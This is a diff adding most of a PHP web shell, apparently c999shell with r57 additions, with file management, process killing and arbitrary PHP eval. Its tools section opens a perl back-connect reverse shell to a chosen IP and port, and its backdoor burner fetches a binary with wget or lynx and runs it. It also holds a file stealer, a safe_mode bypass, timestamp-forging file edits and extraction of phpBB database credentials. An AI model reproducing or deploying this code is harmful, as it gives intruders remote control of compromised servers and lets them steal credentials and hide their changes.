+    $row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><b>".view_perms_color($v)."</b></a>";
+    if ($o == ".") {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">"; $i--;}
+    else {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";}
+    if (is_dir($v)) {$row[] = "<a href=\"".$surl."act=d&d=".$uv."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;".$checkbox;}
+    else {$row[] = "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\"><img src=\"".$surl."act=img&img=change\" alt=\"Change\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\"><img src=\"".$surl."act=img&img=download\" alt=\"Download\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;".$checkbox;}
+    if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;}
+    elseif (is_link($v)) {$tab["links"][] = $row;}
+    elseif (is_dir($v)) {$tab["folders"][] = $row;}
+    elseif (is_file($v)) {$tab["files"][] = $row;}
+    $i++;
+   }
+  }
+  // Compiling table
+  $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]);
+  echo "<center><b>Listing folder (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders):</b></center><br><TABLE cellSpacing=0 cellPadding=0 width=100% bgcolor=#000000 borderColorLight=#433333 border=0><form action=\"".$surl."\" method=POST name=\"ls_form\"><input type=hidden name=act value=".$dspact."><input type=hidden name=d value=".$d.">";
+  foreach($table as $row)
+  {
+   echo "<tr>\r\n";
+   foreach($row as $v) {echo "<td>".$v."</td>\r\n";}
+   echo "</tr>\r\n";
+  }
+  echo "</table><hr size=\"1\" noshade><p align=\"right\">
+  <script>
+  function ls_setcheckboxall(status)
+  {
+   var id = 1;
+   var num = ".(count($table)-2).";
+   while (id <= num)
+   {
+    document.getElementById('actbox'+id).checked = status;
+    id++;
+   }
+  }
+  function ls_reverse_all()
+  {
+   var id = 1;
+   var num = ".(count($table)-2).";
+   while (id <= num)
+   {
+    document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked;
+    id++;
+   }
+  }
+  </script>
+  <input type=\"button\" onclick=\"ls_setcheckboxall(true);\" value=\"Select all\">&nbsp;&nbsp;<input type=\"button\" onclick=\"ls_setcheckboxall(false);\" value=\"Unselect all\">  
+  <b><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\">";
+  if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff))
+  {
+   echo "<input type=submit name=actarcbuff value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actpastebuff\" value=\"Paste\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actemptybuff\" value=\"Empty buffer\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
+  }
+  echo "<select name=act><option value=\"".$act."\">With selected:</option>";
+  echo "<option value=delete".($dspact == "delete"?" selected":"").">Delete</option>";
+  echo "<option value=chmod".($dspact == "chmod"?" selected":"").">Change-mode</option>";
+  if ($usefsbuff)
+  {
+   echo "<option value=cut".($dspact == "cut"?" selected":"").">Cut</option>";
+   echo "<option value=copy".($dspact == "copy"?" selected":"").">Copy</option>";
+   echo "<option value=unselect".($dspact == "unselect"?" selected":"").">Unselect</option>";
+  }
+  echo "</select>&nbsp;<input type=submit value=\"Confirm\"></p>";
+  echo "</form>";
+}
+}
+if ($act == "tools")
+{
+
+
+
+
+
+
+?>
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1>
+<tr><td height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Bind Functions By r57  </b></a> ::</b></p></td></tr>
+<tr>
+  <td width="50%" height="83" valign="top"><center>
+    <div align="center">
+    </div>
+<form action="<?php echo $surl; ?>">
+<b>Bind With Backd00r Burner</b></br><form action="<?php echo $surl;?>"><input type=hidden name=act value=tools><select size=\"1\" name=dolma><option value="wgetcan">Use Wget</option><option value="lynxcan">Use lynx -dump</option><option value="freadcan">Use Fread</option></select></br></br><input type="submit" value="Burn it bAby"></form>
+    </td>
+  <td width="50%" height="83" valign="top"><center>
+   <center>
+  
+
+   <b>Back-Connection :</b></br><form action="<?php echo $surl;?>"> <b>Ip (default is your ip) :</br> </b><input type=hidden name=act value=tools><input type="text" name="ipi" value="<?echo getenv('REMOTE_ADDR');?>"></br><b>Port:</br></b><input type="text" name="pipi" value="4392"></br><input type="submit" value="C0nnect ->"></br></form>
+Click "Connect" only after open port for it. You should use NetCat&copy;, run "<b>nc -l -n -v -p <?php echo $bc_port; ?></b>"!<br><br>
+   
+   </center>
+    </td>
+</tr></TABLE>
+
+
+
+
+
+
+
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1>
+<tr><td height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>File Stealer Function Ripped fRom Tontonq 's File Stealer ... </b></a> ::</b></p></td></tr>
+<tr>
+  <td width="50%" height="83" valign="top"><center>
+    <div align="center"><b>Safe_Mode Bypass</b>
+    <form action="<?php echo $surl; ?>" method="POST">
+    <input type=hidden name=act value=tools>
+    <textarea name="erorr" cols=100 rows=10></textarea></br>
+    <input type="text" name="nere" value="<?echo "$real\index.php";?> "size=84>
+    <input type="submit" value="Write 2 File !!">
+    
+    </form>
+    
+    
+    
+    
+    
+    
+    
+    
+    
+    
+    
+    </div>
+
+    </td>
+  <td width="50%" height="83" valign="top"><center>
+   <center>
+   <form action="<?php echo $surl; ?>" method="POST">
+   <input type=hidden name=act value=tools>
+   Dosyanin Adresi ? = <input type="text" name="dosyaa" size="81" maxlength=500  value=""><br><br>
+Nereya Kaydolcak? = <input type="text" name="yeniyer" size=81 maxlength=191 value="<?php echo "$real/sploitz.zip"; ?>"><br><br>
+<input type=submit class='stealthSubmit' Value='Dosyayi Chek'>
+</form>
+<br><br><br>
+   
+   
+   
+   
+   </center>
+   
+   </center>
+    </td>
+</tr></TABLE>
+
+
+
+
+
+
+
+
+
+
+
+
+<?php
+
+if (isset($_POST['dosyaa']))
+{
+dosyayicek($_POST['dosyaa'],$_POST['yeniyer']);
+
+}
+if (!empty($_GET['ipi']) && !empty($_GET['pipi']))
+{
+cf("/tmp/back",$back_connect);
+$p2=which("perl");
+$blah = ex($p2." /tmp/back ".$_GET['ipi']." ".$_GET['pipi']." &");
+echo"<b>Now script try connect to ".$_GET['ipi']." port ".$_GET['pipi']." ...</b>";
+}
+if (!empty($_GET['dolma']))
+{  
+$sayko=htmlspecialchars($_GET['dolma']);
+if ($sayko == "wgetcan")
+{
+
+myshellexec("wget $adires -O sayko_bind;chmod 777 sayko_bind;./sayko_bind");
+
+
+}
+
+else if ($sayko =="freadcan")
+{
+dosyayicek($adires,"sayko_bind");
+myshellexec("./sayko_bind");
+}
+
+else if ($sayko == "lynxcan")
+{
+myshellexec("lynx -dump $adires > sayko_bind;chmod 777 sayko_bind;./sayko_bind");
+
+}
+
+
+
+
+
+}
+
+if  (!empty($_POST['erorr']))
+{
+
+
+
+error_log($_POST['erorr'], 3, "php://".$_POST['nere']);
+
+
+
+}
+
+
+
+
+
+
+
+
+
+}
+if ($act == "processes")
+{
+echo "<b>Processes:</b><br>";
+if (!$win) {$handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":"");}
+else {$handler = "tasklist";}
+$ret = myshellexec($handler);
+if (!$ret) {echo "Can't execute \"".$handler."\"!";}
+else
+{
+  if (empty($processes_sort)) {$processes_sort = $sort_default;}
+  $parsesort = parsesort($processes_sort);
+  if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;}
+  $k = $parsesort[0];
+  if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
+  else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
+  $ret = htmlspecialchars($ret);
+  if (!$win)
+  {
+   if ($pid)
+   {
+    if (is_null($sig)) {$sig = 9;}
+    echo "Sending signal ".$sig." to #".$pid."... ";
+    if (posix_kill($pid,$sig)) {echo "OK.";}
+    else {echo "ERROR.";}
+   }
+   while (ereg("  ",$ret)) {$ret = str_replace("  "," ",$ret);}
+   $stack = explode("\n",$ret);
+   $head = explode(" ",$stack[0]);
+   unset($stack[0]);
+   for($i=0;$i<count($head);$i++)
+   {
+    if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".$head[$i]."</b></a>";}
+   }
+   $prcs = array();
+   foreach ($stack as $line)
+   {
+    if (!empty($line))
+{
+echo "<tr>";
+     $line = explode(" ",$line);
+     $line[10] = join(" ",array_slice($line,10));
+     $line = array_slice($line,0,11);
+     if ($line[0] == get_current_user()) {$line[0] = "<font color=green>".$line[0]."</font>";}
+     $line[] = "<a href=\"".$surl."act=processes&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>";
+     $prcs[] = $line;
+     echo "</tr>";
+    }
+   }
+  }
+  else
+  {
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("",$ret)) {$ret = str_replace("","",$ret);}
+   while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
+   $ret = convert_cyr_string($ret,"d","w");
+   $stack = explode("\n",$ret);
+   unset($stack[0],$stack[2]);
+   $stack = array_values($stack);
+   $head = explode("",$stack[0]);
+   $head[1] = explode(" ",$head[1]);
+   $head[1] = $head[1][0];
+   $stack = array_slice($stack,1);
+   unset($head[2]);
+   $head = array_values($head);
+   if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
+   else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
+   if ($k > count($head)) {$k = count($head)-1;}
+   for($i=0;$i<count($head);$i++)
+   {
+    if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".trim($head[$i])."</b></a>";}
+   }
+   $prcs = array();
+   foreach ($stack as $line)
+   {
+    if (!empty($line))
+    {
+     echo "<tr>";
+     $line = explode("",$line);
+     $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]);
+     $line[2] = intval(str_replace(" ","",$line[2]))*1024;  
+     $prcs[] = $line;
+     echo "</tr>";
+    }
+   }
+  }
+  $head[$k] = "<b>".$head[$k]."</b>".$y;
+  $v = $processes_sort[0];
+  usort($prcs,"tabsort");
+  if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);}
+  $tab = array();
+  $tab[] = $head;
+  $tab = array_merge($tab,$prcs);
+  echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">";
+  foreach($tab as $i=>$k)
+  {
+   echo "<tr>";
+   foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "<td>".$v."</td>";}
+   echo "</tr>";
+  }
+  echo "</table>";
+}
+}
+if ($act == "eval")
+{
+if (!empty($eval))
+{
+  echo "<b>Result of execution this PHP-code</b>:<br>";
+  $tmp = ob_get_contents();
+  $olddir = realpath(".");
+  @chdir($d);
+  if ($tmp)
+  {
+   ob_clean();
+   eval($eval);
+   $ret = ob_get_contents();
+   $ret = convert_cyr_string($ret,"d","w");
+   ob_clean();
+   echo $tmp;
+   if ($eval_txt)
+   {
+    $rows = count(explode("\r\n",$ret))+1;
+    if ($rows < 10) {$rows = 10;}
+    echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
+   }
+   else {echo $ret."<br>";}
+  }
+  else
+  {
+   if ($eval_txt)
+   {
+    echo "<br><textarea cols=\"122\" rows=\"15\" readonly>";
+    eval($eval);
+    echo "</textarea>";
+   }
+   else {echo $ret;}
+  }
+  @chdir($olddir);
+}
+else {echo "<b>Execution PHP-code</b>"; if (empty($eval_txt)) {$eval_txt = TRUE;}}
+echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=eval><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>";
+}
+if ($act == "f")
+{
+if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit")
+{
+  if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";}
+  else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";}
+}
+else
+{
+  $r = @file_get_contents($d.$f);
+  $ext = explode(".",$f);
+  $c = count($ext)-1;
+  $ext = $ext[$c];
+  $ext = strtolower($ext);
+  $rft = "";
+  foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}}
+  if (eregi("sess_(.*)",$f)) {$rft = "phpsess";}
+  if (empty($ft)) {$ft = $rft;}
+  $arr = array(
+   array("<img src=\"".$surl."act=img&img=ext_diz\" border=\"0\">","info"),
+   array("<img src=\"".$surl."act=img&img=ext_html\" border=\"0\">","html"),
+   array("<img src=\"".$surl."act=img&img=ext_txt\" border=\"0\">","txt"),
+   array("Code","code"),
+   array("Session","phpsess"),
+   array("<img src=\"".$surl."act=img&img=ext_exe\" border=\"0\">","exe"),
+   array("SDB","sdb"),
+   array("<img src=\"".$surl."act=img&img=ext_gif\" border=\"0\">","img"),
+   array("<img src=\"".$surl."act=img&img=ext_ini\" border=\"0\">","ini"),
+   array("<img src=\"".$surl."act=img&img=download\" border=\"0\">","download"),
+   array("<img src=\"".$surl."act=img&img=ext_rtf\" border=\"0\">","notepad"),
+   array("<img src=\"".$surl."act=img&img=change\" border=\"0\">","edit")
+  );
+  echo "<b>Viewing file:&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".view_perms_color($d.$f)."</b><br>Select action/file-type:<br>";
+  foreach($arr as $t)
+  {
+   if ($t[1] == $rft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=green>".$t[0]."</font></a>";}
+   elseif ($t[1] == $ft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>";}
+   else {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>";}
+   echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |";
+  }
+  echo "<hr size=\"1\" noshade>";
+  if ($ft == "info")
+  {
+   echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> ".$d.$f."</td></tr><tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr><tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>";
+   if (!$win)
+   {
+    echo "<tr><td><b>Owner/Group</b></td><td> ";     
+    $ow = posix_getpwuid(fileowner($d.$f));
+    $gr = posix_getgrgid(filegroup($d.$f));
+    echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f));
+   }
+   echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&f=".urlencode($f)."&d=".urlencode($d)."\">".view_perms_color($d.$f)."</a></td></tr><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table><br>";
+   $fi = fopen($d.$f,"rb");
+   if ($fi)
+   {
+    if ($fullhexdump) {echo "<b>FULL HEXDUMP</b>"; $str = fread($fi,filesize($d.$f));}
+    else {echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi,$hexdump_lines*$hexdump_rows);}
+    $n = 0;
+    $a0 = "00000000<br>";
+    $a1 = "";
+    $a2 = "";
+    for ($i=0; $i<strlen($str); $i++)
+    {
+     $a1 .= sprintf("%02X",ord($str[$i]))." ";
+     switch (ord($str[$i]))
+     {
+      case 0:  $a2 .= "<font>0</font>"; break;
+      case 32:
+      case 10:
+      case 13: $a2 .= "&nbsp;"; break;
+      default: $a2 .= htmlspecialchars($str[$i]);
+     }
+     $n++;
+     if ($n == $hexdump_rows)
+     {
+      $n = 0;
+      if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";}
+      $a1 .= "<br>";
+      $a2 .= "<br>";
+     }
+    }
+    //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."<br>";}
+    echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4><tr><td bgcolor=#666666>".$a0."</td><td bgcolor=000000>".$a1."</td><td bgcolor=000000>".$a2."</td></tr></table><br>";
+   }
+   $encoded = "";
+   if ($base64 == 1)
+   {
+    echo "<b>Base64 Encode</b><br>";
+    $encoded = base64_encode(file_get_contents($d.$f));
+   }
+   elseif($base64 == 2)
+   {
+    echo "<b>Base64 Encode + Chunk</b><br>";
+    $encoded = chunk_split(base64_encode(file_get_contents($d.$f)));
+   }
+   elseif($base64 == 3)
+   {
+    echo "<b>Base64 Encode + Chunk + Quotes</b><br>";
+    $encoded = base64_encode(file_get_contents($d.$f));
+    $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2);
+   }
+   elseif($base64 == 4)
+   {
+    $text = file_get_contents($d.$f);
+    $encoded = base64_decode($text);
+    echo "<b>Base64 Decode";
+    if (base64_encode($encoded) != $text) {echo " (failed)";}
+    echo "</b><br>";
+   }
+   if (!empty($encoded))
+   {
+    echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>";
+   }
+   echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b>
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr>
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr>
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>]&nbsp;</nobr>
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr>
+<P>";
+  }
+  elseif ($ft == "html")
+  {
+   if ($white) {@ob_clean();}
+   echo $r;
+   if ($white) {c999shexit();}
+  }
+  elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";}
+  elseif ($ft == "ini") {echo "<pre>"; var_dump(parse_ini_file($d.$f,TRUE)); echo "</pre>";}
+  elseif ($ft == "phpsess")
+  {
+   echo "<pre>";
+   $v = explode("|",$r);
+   echo $v[0]."<br>";
+   var_dump(unserialize($v[1]));
+   echo "</pre>";
+  }
+  elseif ($ft == "exe")
+  {
+   $ext = explode(".",$f);
+   $c = count($ext)-1;
+   $ext = $ext[$c];
+   $ext = strtolower($ext);
+   $rft = "";
+   foreach($exeftypes as $k=>$v)
+   {
+    if (in_array($ext,$v)) {$rft = $k; break;}
+   }
+   $cmd = str_replace("%f%",$f,$rft);
+   echo "<b>Execute file:</b><form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"><br>Display in text-area<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked><input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\"><br><input type=submit name=submit value=\"Execute\"></form>";
+  }
+  elseif ($ft == "sdb") {echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>";}
+  elseif ($ft == "code")
+  {
+   if (ereg("php"."BB 2.(.*) auto-generated config file",$r))
+   {
+    $arr = explode("\n",$r);
+    if (count($arr == 18))
+    {
+     include($d.$f);
+     echo "<b>phpBB configuration is detected in this file!<br>";
+     if ($dbms == "mysql4") {$dbms = "mysql";}
+     if ($dbms == "mysql") {echo "<a href=\"".$surl."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."&sql_port=3306&sql_db=".htmlspecialchars($dbname)."\"><b><u>Connect to DB</u></b></a><br><br>";}
+     else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c999shell. Please, report us for fix.";}
+     echo "Parameters for manual connect:<br>";
+     $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd);
+     foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";}
+     echo "</b><hr size=\"1\" noshade>";
+    }
+   }
+   echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: ".$highlight_background .";\">";
+   if (!empty($white)) {@ob_clean();}
+   highlight_file($d.$f);
+   if (!empty($white)) {c999shexit();}
+   echo "</div>";
+  }
+  elseif ($ft == "download")
+  {
+   @ob_clean();
+   header("Content-type: application/octet-stream");
+   header("Content-length: ".filesize($d.$f));
+   header("Content-disposition: attachment; filename=\"".$f."\";");
+   echo $r;
+   exit;
+  }
+  elseif ($ft == "notepad")
+  {
+   @ob_clean();
+   header("Content-type: text/plain");
+   header("Content-disposition: attachment; filename=\"".$f.".txt\";");
+   echo($r);
+   exit;
+  }
+  elseif ($ft == "img")
+  {
+   $inf = getimagesize($d.$f);
+   if (!$white)
+   {
+    if (empty($imgsize)) {$imgsize = 20;}
+    $width = $inf[0]/100*$imgsize;
+    $height = $inf[1]/100*$imgsize;
+    echo "<center><b>Size:</b>&nbsp;";
+    $sizes = array("100","50","20");
+    foreach ($sizes as $v)
+    {
+     echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=img&d=".urlencode($d)."&imgsize=".$v."\">";
+     if ($imgsize != $v ) {echo $v;}
+     else {echo "<u>".$v."</u>";}
+     echo "</a>&nbsp;&nbsp;&nbsp;";
+    }
+    echo "<br><br><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" width=\"".$width."\" height=\"".$height."\" border=\"1\"></center>";
+   }
+   else
+   {
+    @ob_clean();
+    $ext = explode($f,".");
+    $ext = $ext[count($ext)-1];
+    header("Content-type: ".$inf["mime"]);
+    readfile($d.$f);
+    exit;
+   }
+  }
+  elseif ($ft == "edit")
+  {
+   if (!empty($submit))
+   {
+    if ($filestealth) {$stat = stat($d.$f);}
+    $fp = fopen($d.$f,"w");
+    if (!$fp) {echo "<b>Can't write to file!</b>";}
+    else
+    {
+     echo "<b>Saved!</b>";
+     fwrite($fp,$edit_text);
+     fclose($fp);
+     if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);}
+     $r = $edit_text;
+    }
+   }
+   $rows = count(explode("\r\n",$r));
+   if ($rows < 10) {$rows = 10;}
+   if ($rows > 30) {$rows = 30;}
+   echo "<form action=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."\" method=POST><input type=submit name=submit value=\"Save\">&nbsp;<input type=\"reset\" value=\"Reset\">&nbsp;<input type=\"button\" onclick=\"location.href='".addslashes($surl."act=ls&d=".substr($d,0,-1))."';\" value=\"Back\"><br><textarea name=\"edit_text\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>";
+  }
+  elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";}
+  else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";}
+}
+}
+}
+else
+{
+@ob_clean();
+$images = array(
+"arrow_ltr"=>
+"R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ".
+"SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==",
+"back"=>
+"R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
+"aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt".
+"Wg0JADs=",
+"buffer"=>
+"R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo".
+"eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD".
+"Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==",
+"change"=>
+"R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+".
+"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA".
+"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC".
+"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA".
+"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL".
+"zMshADs=",
+"delete"=>
+"R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp".
+"6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw".
+"sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv".
+"vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl".
+"ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
